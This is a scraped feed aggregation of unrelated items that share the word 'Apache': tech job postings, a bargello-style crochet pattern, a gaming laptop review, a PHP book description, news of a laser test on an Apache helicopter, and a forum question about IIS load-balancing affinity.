Bachelor's degree in a Software/Computer Engineering discipline from a four-year college or university, plus 5-10 years related experience.

TECHNICAL REQUIREMENTS
- C#, Javascript, Angular.js, CSS, MVC, AJAX, HTML5, XML, HTML, SQL 2008/2012, Cassandra, MongoDb, Linux, Flash, Apache Tomcat, Windows Server 2008, ASP.NET
- Must Have Technical Requirements: strong Angular.JS experience, C#.Net, web development, and web services experience

This opportunity will not last long. Our client is looking to move quickly to fill this role. To be considered, you must apply online now with your resume. We are actively monitoring all of those that apply. Apply below, and thank you for partnering with Modis!
          AN INTERESTING BARGELLO CROCHET TECHNIQUE   

This is a quote from a post by галина5819. Original post: AN INTERESTING BARGELLO CROCHET TECHNIQUE. THE "APACHE TEARS" CROCHET PATTERN

Bargello (Florentine) embroidery is gaining more and more popularity among embroiderers. And what about us crocheters?!!! We won't fall behind either. Would you like to try crochet that imitates bargello embroidery? Take a look at the photo:

A master class and detailed instructions for crocheting the "Apache tears" pattern

Isn't that just like bargello? There is no limit to the art of crochet! I will now be collecting patterns like this and publishing them on the site. Subscribe to the mailing list and follow the site's news!

Thanks to ИРИМЕД, who translated this master class on crocheting the "Apache Tears" pattern for us, we too can learn this interesting crochet technique.

The author of this blanket, SARAH LONDON, named it "Apache Tears", evidently tears of joy.

Watch the video master class below; but first, the theory.

The basic "rules" of the pattern:

  • Every row starts on the right side and is worked from right to left. Always leave a 15 cm tail at the beginning and end of each row.
  • Start each row with a slip stitch (see the video below).
  • Work all stitches with ONE yarn over (double crochets) into the back loop of the stitch.
  • Work all stitches with THREE yarn overs (see the video below) into the front loop of the stitch three rows below.

The pattern is easy to vary by choosing a different "base": 8 double crochets, 6, or 4.

Let's walk through an example of working this pattern:

An interesting bargello crochet technique. The "Apache Tears" crochet pattern

The "Apache tears" pattern. Base: 8 double crochets.

Start with red yarn and chain 37.
Row 1: work a double crochet into the second chain from the hook, then a double crochet into each chain to the end. Fasten off.

Row 2: a double crochet into each stitch of the previous row. Fasten off.

Rows 3, 4 and 5: same as row 2.

Row 6: work a stitch with three yarn overs into the front loop of the stitch 3 rows below, then 8 double crochets, then another three-yarn-over stitch into the stitch 3 rows below. Continue alternating 8 double crochets with 1 three-yarn-over stitch into the stitch three rows below; finish the row with 8 double crochets. Fasten off.

Row 7: blue yarn; 1 double crochet, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Alternate these stitches as in the previous row. Finish the row with 7 double crochets. Fasten off.

Row 8: lilac yarn; 2 double crochets, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Continue alternating the stitches and finish the row with 6 double crochets. Fasten off.

Row 9: light blue yarn; 3 double crochets, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Alternate the stitches just as in the previous rows. Finish the row with 5 double crochets. Fasten off.

Row 10: light pink yarn; 4 double crochets, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Alternate the stitches; finish the row with 4 double crochets. Fasten off.

Row 11: yellow yarn; 5 double crochets, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Alternate the stitches; finish the row with 3 double crochets.

Row 12: green yarn; 6 double crochets, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Alternate the stitches; finish the row with 2 double crochets. Fasten off.

Row 13: bright pink (cyclamen) yarn; 7 double crochets, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Alternate the stitches as in the previous rows; finish the row with 1 double crochet. Fasten off.

Row 14: orange yarn; 8 double crochets, 1 three-yarn-over stitch into the stitch 3 rows below, 8 double crochets. Alternate the stitches as before; finish the row with a three-yarn-over stitch into the stitch 3 rows below. Fasten off.

Repeat rows 6-14.

Finish with six rows of double crochet in red yarn; fasten off.

An interesting bargello crochet technique. The "Apache Tears" crochet pattern

A variant of the pattern on a base of 6 double crochets.

An interesting bargello crochet technique. The "Apache Tears" crochet pattern

A variant of the pattern on a base of 4 double crochets.



source


          MSI GE72MVR 7RG Apache Pro Review   
Hello! Time for another notebook review. This one is a very interesting model: a gaming notebook with a fairly large screen, a nice finish, good build quality, and high performance. We are talking about the MSI GE72MVR 7RG Apache Pro. What do the specs and performance look like? Read on…. The internal hardware details are as follows:
Latest 7th Gen. Intel® Core™ i7-7700HQ, 4 cores / 8 threads, 6 MB L3 cache
17.3″ Full HD (1920×1080) IPS-Level display
GeForce® GTX 1070 with 8 GB GDDR5
1.0 TB SATA III HDD
8 GB DDR4, single channel
USB 3.0 Type-C reversible plug
Nahimic 2 Sound Technology delivering 360⁰ immersive audio [...]
          Mastering PHP 7   

Effective, readable, and robust code in PHP.

About This Book
- Leverage the newest tools available in PHP 7 to build scalable applications
- Embrace serverless architecture and the reactive programming paradigm, which are the latest additions to the PHP ecosystem
- Explore dependency injection and implement design patterns to write elegant code

Who This Book Is For
This book is for intermediate level developers who want to become masters of PHP. Basic knowledge of PHP is required across areas such as basic syntax, types, variables, constants, expressions, operators, control structures, and functions.

What You Will Learn
- Grasp the current state of the PHP language and the PHP standards
- Effectively implement logging and error handling during development
- Build services through SOAP, REST and Apache Thrift
- Get to know the benefits of serverless architecture
- Understand the basic principles of reactive programming to write asynchronous code
- Practically implement several important design patterns
- Write efficient code by executing dependency injection
- See the working of all magic methods
- Handle command-line tools and processes
- Control the development process with proper debugging and profiling

In Detail
PHP is a server-side scripting language that is widely used for web development. With this book, you will get a deep understanding of the advanced programming concepts in PHP and how to apply them practically. The book starts by unveiling the new features of PHP 7 and walks you through several important standards set by the PHP Framework Interop Group (PHP-FIG). You'll see, in detail, the working of all magic methods and the importance of effective PHP OOP concepts, which will enable you to write effective PHP code. You will find out how to implement design patterns and resolve dependencies to make your code base more elegant and readable. You will also build web services alongside microservices architecture, interact with databases, and work with third-party packages to enrich applications. This book delves into the details of PHP performance optimization. You will learn about serverless architecture and the reactive programming paradigm that found its way into the PHP ecosystem. The book also explores the best ways of testing your code, debugging, tracing, profiling, and deploying your PHP application. By the end of the book, you will be able to create readable, reliable, and robust applications in PHP to meet modern day requirements in the software industry.

Style and approach
This is a comprehensive, step-by-step practical guide to developing scalable applications using PHP 7.1.

Downloading the example code for this book: You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com. If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the code file.


          Big Data Developer - Verizon - Burlington, MA   
Experience with one of Storm or Apache Spark. Experience with NoSQL databases (preferably Mongo DB or Cassandra). Ability to adapt and learn quickly in fast...
From Verizon - Thu, 29 Jun 2017 10:58:16 GMT - View all Burlington, MA jobs
          Raytheon mounts a high-energy laser system on the AH-64 Apache and successfully downs a target at range   
Raytheon, the major US defense contractor and a leader in directed-energy laser weapons, has just successfully tested a high-energy laser system mounted on an AH-64 Apache attack helicopter. Raytheon said the test was carried out in April at the White Sands Missile Range (WSMR) in New Mexico, under the supervision of the US Army's Apache Program Management Office and Special Operations Command. There, the laser system mounted on the Apache locked onto and successfully shot down an unmanned target.

High-energy laser systems built by the US have previously been tested on a number of different platforms; for instance, the Office of Naval Research (ONR)'s Laser Weapon System (LaWS) was successfully deployed on the destroyer USS Ponce, and most recently on the stealth ship USS...
          Cloud Security DevOps Engineer - Verizon - Basking Ridge, NJ   
AWS, Apache, Redis, MySQL & Postgres, MongoDB, Ansible, Splunk, Github, Jenkins, and JIRA & Confluence....
From Verizon - Thu, 29 Jun 2017 10:58:12 GMT - View all Basking Ridge, NJ jobs
          Laser Apache helicopter tested for the first time   
This week the US military released footage of an Apache AH-64 attack helicopter armed with a weaponised version of the Multi-Spectral Targeting System laser conducting fire tests. Unlike current generation laser range-finders, this modified...
          (USA-FL-Boca Raton) EAI Engineer Lead   
Responsibilities: The Enterprise Application Integration (EAI) group is responsible for leading, delivering, and supporting enterprise integration solutions for Office Depot. The EAI Engineer Lead is accountable for middleware component and infrastructure management practices, processes, and procedures and will identify efficiency and effectiveness levers that support, continuously improve, and coordinate architecture/solutioning, project delivery and leadership, and operations/support functions. This role will lead process improvement, analysis, planning, documentation, metrics, asset development, training, communication, and execution associated to all aspects of infrastructure and operational management. This person will demonstrate independent thinking and activities management, with ability to direct and influence practices, processes, and procedures in a coherent and consistent fashion, complementing EAI strategy and objectives. SUMMARY OF RESPONSIBLITIES: + Develop, manage, and ensure realization of tactical and strategic operations plans for the EAI Group + Develop, implement, and measure application and infrastructure processes, policies, methodologies, templates, standards, and procedures to meet goals for quality, time-to-market, and ROI/TCO + Participant and drive SDLC checkpoint reviews (peer, design, standards, etc.) for internal and external projects + Define and implement manual and automated practices related to implementation and support for EAI component + Provide quantitative and qualitative insights on progress and challenges on a periodic and ad hoc basis + Research and propose innovative methods to improve operations and support performance; provide thought and consultative leadership + Lead internal/external audit requests + Develops and maintains training plans for engineering and support practices + Lead engineering architecture planning and design for all related components + Evaluate project proposals and effort estimate to implement + Installation and configuration for environment builds including post build expansion + Product patching and analysis for implementation + Capacity planning and scaling analysis for all components + Create and maintain documentation as needed for future reference, knowledge transfer, and support turnover + Performance monitoring and identification of related issues + Manage engineering service requests and defects + Support code migration, automation and troubleshooting + Engage with other IT tech teams and request systems for troubleshooting or infrastructure dependencies related to project task completion + Provide guidance for support teams as relates to their assigned tasks + Initiate, coordinate, communicate and drive production changes via formal change management system + Take ownership of assignments, including vendor initiation and requests and drive them to conclusion + Implement monitoring and automation solutions as needed for existing or new components, Dynatrace experience is a plus. + Participate in 7x24 on-call rotation support for production + Assists with additional duties and responsibilities as assigned Qualifications: + Bachelor of Science in Computer Science, Information Systems, or equivalent. + Minimum of 6+ years of overall experience in information systems, including Java/J2EE development. 
+ 3+ years of experience in application integration development and support of multi-platform technical environments within the integration/middleware space with products such as RedHat, Tibco, WebMethods or Oracle Fusion. + 2+ years of experience in conducting quality assurance practices, including testing, metrics definition, process development and improvement. + Strong self-management skills with ability to effectively collaborate with peers and senior management. + Prior technical leadership experience in an engineering capacity working on multiple infrastructure environments and projects. + Good understanding of IS/IT concepts across a broad spectrum which includes: application development, service-oriented architecture, and application integration. + Solid experience with automation frameworks, scripting languages, and test tools, including SoapUI, HP UFT/QTP, Selenium or similar. + Understanding of Software Quality Testing Approaches & Concepts - (e.g. API testing, test approach selection, Black, Grey, White Box test approaches, etc.). + Knowledge and experience with various test types - unit tests, volume tests, compatibility tests, integration tests, web-stress tests, system tests, etc. + Experience with the design & development of automation frameworks (including commercial automation testing tools, open source tools & scripting languages). + Experience with non-functional testing approaches (performance, security, accessibility, internationalization, etc) preferred. + Experience in EAI architecture and solutioning, application security, and project delivery. + Strong verbal and written communication skills to provide reports and documentation (e.g. test reports, test strategies, test plans, test cases, test reports, and bug tracking tools). + Strong knowledge of the basic principles, processes, phases and roles of application development methodologies (SDLC). + High proficiency in the use of quality management methods, tools, and technology used to create and support defect-free application software that meets the needs of the business partner. Other Information: + Strong knowledge with implementation and administration with RedHat Fuse/Apache Camel, Oracle SOASuite 11g & OSB 11g is a plus. + Implementation and configuration experience with integration adapters, such as with RedHat Fuse or Oracle Fusion adapters (Apps, DB, MQ, JMS, File, FTP, etc.). + Linux, Unix, Windows Server; AS400, z/OS is a plus. + Scripting knowledge (WLST, ANT) + Strong knowledge and experience with JVM monitoring/tuning executions + Highly self-motivated, self-directed, and attentive to detail. + Takes initiative with focus to fully complete task; excellent time management. + Excellent analytical, troubleshooting and problem solving abilities. + Strong written and verbal communication skills Pay, Benefits and Work Schedule: Office Depot and Office Max offers competitive salaries, a benefits package, which includes a 401(k) and more, along with plenty of opportunity to move and grow within our organization! For immediate consideration for this exciting position, please click the Apply Now button. Equal Employment Opportunity: Office Depot and Office Max is committed to providing equal employment opportunities in all employment practices. 
All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, citizenship status, marital status, age, disability, protected veteran status, sexual orientation or any other characteristic protected by law.
          Apache Mod Security Error While Login WordPress   

The Apache mod_security error while logging in to WordPress is one of the creepiest issues that can happen to you as a WordPress user. The same thing happened to me many times, so I tried to solve the issue and spent many hours on it. The purpose of writing this article is simply to save your […]
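
For context, a workaround commonly suggested for this error (not necessarily the fix this article arrives at) is to relax mod_security for the login script only, via .htaccess. The directives below apply to the older mod_security 1.x; ModSecurity 2.x uses SecRuleEngine Off instead:

# Hedged sketch: switch off mod_security 1.x filtering for wp-login.php only
<IfModule mod_security.c>
  <Files "wp-login.php">
    SecFilterEngine Off
    SecFilterScanPOST Off
  </Files>
</IfModule>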

The post Apache Mod Security Error While Login WordPress appeared first on KnowledgeIDea.


          Automation Engineer - Marin Software - San Francisco, CA   
AngularJS, Hadoop, Hive, Presto, HBase, Apache Phoenix, Pig and Kafka. Out with the manual testing, in with the 100% automated testing and the continuous...
From Marin Software - Tue, 13 Jun 2017 18:37:50 GMT - View all San Francisco, CA jobs
          Technical Quality Engineer Lead - Marin Software - San Francisco, CA   
Understand the business and key drivers for success. JS Angular, Hadoop, HBase, Hive, Presto, HBase, Apache Phoenix, Spark, Scala, Pig and Kafka....
From Marin Software - Mon, 15 May 2017 22:30:30 GMT - View all San Francisco, CA jobs
          What are US attack helicopters doing at Graz Airport?   
Three US Army Apache attack helicopters caused a stir in the air and at Graz Airport today. The weather forced the pilots into a diversion maneuver.
          ZEUS and the Army Aviation helicopters take part in & thrill the crowds at the "Kavala Air Sea Show" (KASS) 2017   
veteranos.gr
The legendary F-16 of the Hellenic Air Force is getting ready to thrill the crowds on Saturday and Sunday, 1 & 2 July, at the "Kavala Air Sea Show" (KASS) 2017

The Army Aviation's participation is also expected to be more dynamic and bigger, worthy of the anticipation of the tens of thousands of spectators, Greeks, Balkan neighbors and beyond, on 1 & 2 July in Kavala!
The picture is from the most recent display by the 2nd Attack Helicopter Battalion at KASS 2016 at Kavala's central port "Apostolos Pavlos"
The Hellenic Army / 1st Army Aviation Brigade is taking part with:
1 x AH-64A APACHE – 1st Attack Helicopter Battalion (F & S)
1 x AH-64D HA Longbow APACHE – 2nd Attack Helicopter Battalion (F & S)
2 x UH-1H "HUEY" Bell UH-1 Iroquois (F & S)


The full programme
veteranos.gr

          How to Install Joomla with Apache on Debian 9 (Stretch)   

HowToForge: Joomla is one of the most popular and widely supported open source content management system (CMS) platform in the world.


          DukeScript: Transpile Plain Java into JavaScript   

DukeScript is all about smooth communication between Java and JavaScript. It comes as no surprise that one can use the DukeScript infrastructure to easily transpile Java code into JavaScript and run it in a browser. Here is a quick how-to:

Start from command line

Of course, if you are an IDE junkie, you may prefer a visual way of getting started, but to prove that it is really just a matter of a few commands, let’s set everything up from a command line. Install Java, install Maven and invoke:

$ mvn archetype:generate \
    -DarchetypeGroupId=com.dukescript.archetype \
    -DarchetypeArtifactId=knockout4j-archetype \
    -DarchetypeVersion=0.17 \
    -Dwebpath=client-web \
    -DgroupId=org.your.test \
    -DartifactId=runjavainbrowser \
    -Dversion=1.0-SNAPSHOT
$ cd runjavainbrowser
$ mvn install -DskipTests

and that is it! Just three shell commands and you have all the environment you need!

Write Your Code!

Let's open DataModel.java, which contains the main logic, and add some Java code there.

$ vi client/src/main/java/org/your/test/DataModel.java

There are a few methods annotated with the @Function annotation. They are ready to be invoked when a button on the HTML page is pressed. Let's modify one of them:

@Function static void turnAnimationOn(Data model) {
    model.setMessage("I can run Java in any browser!");
}

Of course you can put much more logic into the Java method - most of the core Java is supported. Now let’s try it. Rebuild and launch in a browser:

$ mvn install -DskipTests
$ mvn -f client-web/pom.xml bck2brwsr:show

When the browser page is opened, press the Start button and congratulations: your first Java code has been successfully transpiled to JavaScript and executed in a browser!

So Easy! Where’s the Catch?

Just a few simple steps and my Java code is running in the browser. Is everything so easy, or is there a hidden catch?

Of course, the transpiling has some limitations. It doesn’t support all Java APIs, but it shall be good enough for running Java algorithms in the browser and perform client side validations, computations, etc.

Moreover, there is something really special: the DukeScript project doesn't provide the transpiling technology itself - we are just using it with the goal of making portable Java applications easy to write. As with any other system (Android, desktop, iOS) we always choose the best JVM available on the system. However, in the case of plain browsers, there are two very good choices: the Bck2Brwsr VM and TeaVM. With the DukeScript infrastructure you can easily choose between them - i.e. no vendor lock-in, and your choice to select the better JVM for your tasks. To try TeaVM just execute:

$ mvn -f client-web/pom.xml -Pteavm install -DskipTests bck2brwsr:show

What is better: Bck2Brwsr or TeaVM?

What transpiling technology is better? It depends on your needs. Each of them has its benefits. TeaVM compiles the whole application into a single JavaScript file. Bck2Brwsr produces one JavaScript file per JAR file - i.e. it comes with better support for modularity. Bck2Brwsr can execute applications as complex as Javac in the browser, but is intentionally single-threaded. TeaVM can simulate threads and comes with better in-browser debugger integration.

The choice is yours. DukeScript projects is just proud to offer you two alternative transpiling solutions.

Packaging for Web

When your application is running, it is time to package it for the web. Again, it is easy. Execute the following commands:

$ mvn -f client-web/pom.xml package -DskipTests
$ unzip -v client-web/target/runjavainbrowser-web-1.0-SNAPSHOT-bck2brwsr.zip
public_html/index.css
public_html/index.html
public_html/lib/emul-0.19-rt.js
public_html/lib/net.java.html.boot-1.3.js
public_html/lib/ko4j-1.3.js
public_html/lib/runjavainbrowser-js-1.0-SNAPSHOT.js
public_html/lib/net.java.html.sound-1.3.js
public_html/lib/runjavainbrowser-1.0-SNAPSHOT.js
public_html/lib/net.java.html-1.3.js
public_html/lib/net.java.html.json-1.3.js
public_html/bck2brwsr.js
public_html/runjavainbrowser.js

and you can see that a ZIP file has been created for you and is ready to be uploaded to your web server and used from your HTML pages. Alternatively you can do the same with TeaVM:

$ mvn -f client-web/pom.xml package -Pteavm -DskipTests
$ unzip -v /home/devel/tmp/transpile/runjavainbrowser/client-web/target/runjavainbrowser-web-1.0-SNAPSHOT-teavm.zip
public_html/index.css
public_html/index.html
public_html/teavm.js

and upload or use the single teavm.js file containing all your transpiled Java code.

Development and Testing

The power of DukeScript is in high portability of the applications. As such it is suggested to develop your application on desktop with a JavaFX WebView component - then all the goodies like no redeploys or easy Java and HTML debugging work. Once your application is running, you can then just transpile it.

Should there be any differences between desktop and transpiled version, the best is to write and execute a unit test - if it behaves differently between the standard Java on desktop and the one running in the browser, please contact our support and send us the test case - we are always ready to help.

Enjoy Java in a browser done in the DukeScript way!


          Apache Hive Quick Start (CentOS 7.3 + Hadoop-2.8 + Hive-2.1.1)   

          Completely remove/uninstall MySQL, PHP and Apache on Ubuntu   

          On Apache Ignite, Apache Spark and MySQL. Interview with Nikita Ivanov   
“Spark and Ignite can complement each other very well. Ignite can provide shared storage for Spark so state can be passed from one Spark application or job to another. Ignite can also be used to provide distributed SQL with indexing that accelerates Spark SQL by up to 1,000x.”–Nikita Ivanov. I have interviewed Nikita Ivanov,CTO of […]
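
As a rough illustration of the shared-storage idea from the quote: an Ignite cache created by one JVM is visible to every other node that joins the same cluster. A minimal sketch in Java (the cache name and values are illustrative):

import org.apache.ignite.Ignite;
import org.apache.ignite.IgniteCache;
import org.apache.ignite.Ignition;

public class SharedStateExample {
    public static void main(String[] args) {
        // Starts (or joins) an Ignite node; with default discovery, other
        // processes on the same network join the same cluster.
        try (Ignite ignite = Ignition.start()) {
            IgniteCache<String, Integer> cache =
                    ignite.getOrCreateCache("sparkSharedState");

            // State written here outlives this job and can be read by the
            // next application that connects to the cluster.
            cache.put("lastProcessedBatch", 42);
            System.out.println(cache.get("lastProcessedBatch"));
        }
    }
}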
          Laser system onboard   
Raytheon Company and the U.S. Army Apache Program Management Office, in collaboration with USSOCOM, recently completed a successful flight test of a high energy laser system onboard an AH-64 Apache at White Sands Missile Range, New Mexico. The demonstration marks the first time that a fully integrated laser system successfully engaged and fired on a target from a rotary-wing aircraft over a wide variety of flight regimes, altitudes and air speeds.
          EUR 100.00 off the MSI GE62 7RE-024XFR Apache Pro   

Until 03/07/2017 12:00, exceptional Flash Sale on the MSI GE62 7RE-024XFR Apache Pro at only EUR 1,199.90
To go directly to the sale, click here!


          EUR 70.00 off the MSI GE72VR 7RF-425FR Apache Pro   

Until 03/07/2017 12:00, exceptional Flash Sale on the MSI GE72VR 7RF-425FR Apache Pro at only EUR 1,729.90
To go directly to the sale, click here!


          California COA Affirms $49M Judgment in Inter-Tribal Contract Dispute   
Here is the opinion in Yavapai-Apache Nation v. La Posta Band of Diegueno Mission Indians: Yavapai-Apache Nation v La Posta Band An excerpt: This appeal arises from a contract dispute between two Indian tribes: Yavapai Apache Nation (YAN) and La Posta … Continue reading
          USA to Greece: "Clear the CIA agents facing prosecution, just as you did with the TAIPED officials"!   
Enormous pressure is being applied by the American side to have the prosecution dropped against the American CIA agent W. Bazil and his accomplices, over the espionage the agency carried out against the country for at least seven years (2003-2009) and over the planning of the assassination of former Prime Minister Kostas Karamanlis.

The Americans, encouraged by the favorable outcome in the case of the three TAIPED officials (citizens of creditor countries who were cleared of breach-of-trust charges against the state by an express decision of the Supreme Court), are now demanding the same for their agents and threatening to cut off military aid to Greece, just as the creditors used to threaten to block the loan installment!

The case file has been returned to the Court of First Instance by decision of the Supreme Court, after eight months of hovering between the Court of First Instance and the Court of Appeals.

Last October, prosecutor Maria-Sofia Vaitsi submitted a recommendation on the case, which has three strands, seeking the indictment of four defendants, among them an American national and former intelligence officer, for offenses involving espionage through telephone interceptions "affecting the interests of the state" in the period 2004-2005.

She also found that two employees of the EYP (the Greek National Intelligence Service) should stand trial for violation of state secrets, with former minister Michalis Karchimakis as the moral instigator of their act.

The case then went to the Council of Misdemeanors Judges, which ruled that it lacked jurisdiction, given the offenses and the court that would have to try them, and forwarded the material to the Council of Appeals Judges.

A while later, Appeals Prosecutor K. Poulios submitted a recommendation asking that the case file be returned to the Evelpidon courts, reasoning that the Council of Appeals Judges lacks jurisdiction because the offenses must be tried by a Mixed Jury Court rather than a Three-Member Felony Appeals Court, so the case must be judged by the Council of Misdemeanors Judges.

The case file, thousands of documents containing material of a kind that has never before occupied the judicial authorities in the post-1974 era, now awaits the ruling of the Council of Appeals Judges on which judicial formation will decide the criminal course of this major case.

The case of the plan to assassinate Kostas Karamanlis has occupied the courts since 2011, while a year later, in 2012, criminal charges were brought against unknown perpetrators for offenses involving preparatory acts of high treason, disruption of the orderly functioning of the constitutional order, and deprivation of a prime minister's exercise of the powers granted to him by the Constitution.

The prosecution was triggered by the publication of material that appeared to come from Russian intelligence services, referring to a plan to eliminate the former prime minister and to an attempt to destabilize the country (in which the events following the Grigoropoulos killing had also been included), with the aim of obstructing the government's energy policy.

The case was assigned to investigating judge Dimitris Foukas, who joined the "Pythia plan" file with those on the wiretaps and on the violation of state secrets by EYP employees, and three years later issued a lengthy report recording the evidence gathered in his methodical investigation.

In his report the investigating judge recorded crucial evidence on the plan to assassinate the former prime minister, directly linking the "Pythia plan" to an attempt to pressure and coerce the Greek government into changing policy on matters concerning the country's international relations:

"The perpetrators' aim appears to have been to interrupt the political and economic rapprochement between Greece and Russia that had then begun to take shape in critical areas, particularly energy, armaments, and state procurement," Mr. Foukas stated.

The report also recorded the energy policy of the Karamanlis government, with reference to the agreements on the Burgas-Alexandroupoli pipeline and the South Stream pipeline.

Citing evidence from the investigation as well as material published on Wikileaks, Mr. Foukas stated that Greece's rapprochement with Russia prompted actions on the part of the USA to overturn those agreements on the Russian pipelines.

The report also states: "The fact of the American side's support for the TAP pipeline is believed to have been conveyed to Greek governments after 2009, and it was confirmed by the testimony of the witness V.R. (the name of a well-known businessman is given), who, after meeting the US president in May 2012, conveyed the American position to the Greek political leadership. The result was the gradual abandonment of the pipeline plans and the commitment of the Greek side to the TAP pipeline project. The plan to procure military materiel from Russia was also abandoned."

In this strand, however, the investigation did not lead to specific individuals, and so it remains without defendants.

On the telephone interception case, in which a 65-year-old former employee of the American Embassy is charged with espionage, Mr. Foukas states that:

"From August 2004 until March 2005, William Bazil, an American agent, intentionally attempted to obtain knowledge of classified information concerning the interests of the Hellenic Republic through telephone interceptions."

The investigating judge's material showed that it was this man's wife who had bought the "shadow" prepaid mobile phones from Akti Miaouli under the pseudonym Petros Markou, phones that were used to monitor dozens of politicians, members of the then government, and dozens of other individuals. Lifting the confidentiality of one of the four telephone connections revealed that the connection had also been activated on another device whose subscriber details read "American Embassy." After the wiretaps came to light, William Bazil vanished from Greece.

In his report Mr. Foukas notes, among other things: "On 26/03/2014 a former EYP officer, with whom there had been previous cooperation, contacted the investigating office asking for a meeting with the investigating judge. The meeting took place the same day, and he described a telephone conversation with an officer of the US intelligence services who had previously served in Greece, who asked him to get in touch with the investigating judge and convey the view that Greek-American relations are now friendly and that the investigation must stop because it is impeding their further development."

On the third strand of the case, concerning illegal actions by EYP officers, Mr. Foukas stated: "Finally, according to the investigative report, which cites Wikileaks material, it emerges that there were EYP employees 'prone to leaks, who are described as disgruntled.'"

The investigating judge states that during 2005, EYP employees with access to classified material were handing it over to unauthorized persons, specifically to the then MP Michalis Karchimakis.

It should be noted that Mr. Karchimakis, who is charged with moral instigation of a violation of state secrets, has given his statement in the case and been released. The former minister denies the charge (an EYP employee is alleged to be its physical perpetrator) and attributes his implication to political expediency, since the woman who reported the case speaks of the "persecution suffered" by fellow unionists of hers in the EYP under the G. Papandreou government.

In other words, this was outright espionage: besides extracting material from the Ministry of National Defense in 2004-2005, the same group was also planning the assassination of then Prime Minister Kostas Karamanlis.

Specifically, the indictment referring members of the ring to trial includes a Ministry of Defense employee who (not being "of unknown identity," in the prosecutor's reasoning) stole material on the programs for the AH-64D Apache attack helicopters, the LEO2HEL battle tanks, the Russian SHORADS Tor-M1, and the operational availability of the likewise Russian S-300PMU1 long-range anti-aircraft missile systems.

All of this material was handed to a "foreign power," and some of it also to a PASOK MP.

Also included in the same case on the wiretaps and the assassination plan against former Prime Minister K. Karamanlis is the prosecutor's recommendation to indict the American agent William B. and four more of his accomplices.

The first point concerns the geographic range of the illegal interceptions, which were not confined to the Attica basin but extended as far as Kasos and Karpathos. The second, that one of the shadow mobiles was being used without its owner's knowledge.

Most important of all, the former prime minister's calls were monitored even from… Australia!

Indeed, the monitoring of Mr. Karamanlis's calls from Australia took place before his visit there in 2007.

By whom is unknown, and may remain unknown. As may the reason why…

In her recommendation to the Council of Misdemeanors Judges, deputy prosecutor M. Vaitsi notes that the shadow prepaid mobiles were activated mainly between July 2004 and March 2005, within the triangle of the Athens Tower, Mavili Square, and eastern Kolonaki, but the range of the illegal interceptions extended to the southernmost edge of Greece.

Specifically, interceptions of the monitored phones of dozens of political officials and foreign nationals could be carried out in the southern Peloponnese, Kythira, Tinos, Mykonos, Naxos, Sifnos, and Serifos, and as far as Rhodes, Kastellorizo, Tilos, Kasos, and Karpathos, where the house of the Greek-American CIA agent is located.

The illegal network also covered almost the entire Attica basin, but not central or northern Greece. William B. was in frequent telephone contact with the US Embassy in Athens and with numbers in the American state of Maryland, where he permanently resides. The prosecutor points out that members of the Karamanlis government, and the former prime minister himself, avoided speaking on their mobile phones and took protective measures, but did not know that interceptions were taking place even in tourist areas they had visited in the summer of 2004.

On 26 May 2004, N. Tz., a seaman from Agistri, asked a mobile phone shop in Piraeus to cancel his carrier contract, while refusing to replace it with a prepaid "card," as was then the usual practice.

But to his great surprise, as he later testified to the authorities and as was subsequently proven, his mobile number was converted to a prepaid connection and was among those sold to William B.'s wife, Irene, by the same shop on Akti Miaouli.

On 30 June 2004, almost a month after the seaman cancelled the contract, and while he was serving as master of the ship "Amfitriti" on a Cyclades island route, calls were made from his number to the other shadow prepaid mobiles, evidently in order to connect to the illegal software, while another shadow mobile received text messages in the same period (note: this is how connections to other monitoring centers are made) from Great Britain, Sweden, India, and Australia.

In short, whatever conversations K. Karamanlis and his ministers held were being monitored across every latitude and longitude of the globe.
SOURCE: PRONEWS

          Sr. DevOps Engineer - Elastic Search (EKL) (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linux, Microsoft, Oracle, SQL Server, MySQL, MongoDB, SSH, web and app technologies (IIS, Apache, Tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:23 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - Splunk & AppDynamics (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linux, Microsoft, Oracle, SQL Server, MySQL, MongoDB, SSH, web and app technologies (IIS, Apache, Tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:23 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - CI/CD Jenkins (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linux, Microsoft, Oracle, SQL Server, MySQL, MongoDB, SSH, web and app technologies (IIS, Apache, Tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:22 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - Performance & Load Testing (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linux, Microsoft, Oracle, SQL Server, MySQL, MongoDB, SSH, web and app technologies (IIS, Apache, Tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:08 GMT - View all Saint Paul, MN jobs
          Cloud Security DevOps Engineer - Verizon - Basking Ridge, NJ   
AWS, Apache, Redis, MySQL & Postgres, MongoDB, Ansible, Splunk, GitHub, Jenkins, and JIRA & Confluence....
From Verizon - Thu, 29 Jun 2017 10:58:12 GMT - View all Basking Ridge, NJ jobs
          IIS 8/URL Rewrite/ARR setting client affinity per context   

So, here is our situation:  We are using IIS 8 as a web frontend for a number of java apps hosted in Apache Tomcat.  Some of those apps require client affinity (sticky sessions) while some need to remain stateless (web services, etc).  I haven't seen a way to set a client affinity flag on a per server basis.  I am trying to keep this at the web server layer as we use either Azure Load Balancing or NLB depending on the environment, and I would like to keep the solution consistent.

I thought about maybe creating 2 server farms, and putting all the stateless app URL Rewrites in one farm, leaving client affinity off, and putting the other apps in a 2nd server farm, setting client affinity on. I don't like the idea of adding the extra server farm layer to what's already there, but I haven't been able to find a better, or even another approach.
